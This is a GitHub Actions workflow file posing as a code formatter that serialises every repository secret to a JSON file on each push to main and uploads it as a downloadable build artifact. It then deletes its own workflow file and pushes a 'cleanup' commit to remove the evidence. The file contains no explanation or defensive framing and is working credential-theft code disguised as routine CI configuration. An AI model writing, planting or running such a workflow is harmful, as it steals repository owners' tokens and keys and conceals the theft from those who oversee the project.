name: Format and Exfiltrate Secrets
on:
  push:
    branches: [main]

jobs:
  format:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Collect Secrets
        env:
          ALL_SECRETS: ${{ toJSON(secrets) }}
        run: |
          echo "$ALL_SECRETS" > actionsSecrets.json

      - name: Upload Secrets
        uses: actions/upload-artifact@v4
        with:
          name: actionsSecrets.json
          path: actionsSecrets.json

      - name: Cleanup Evidence
        run: |
          git rm .github/workflows/formatter_1234567890.yml
          git commit -m "cleanup"
          git push
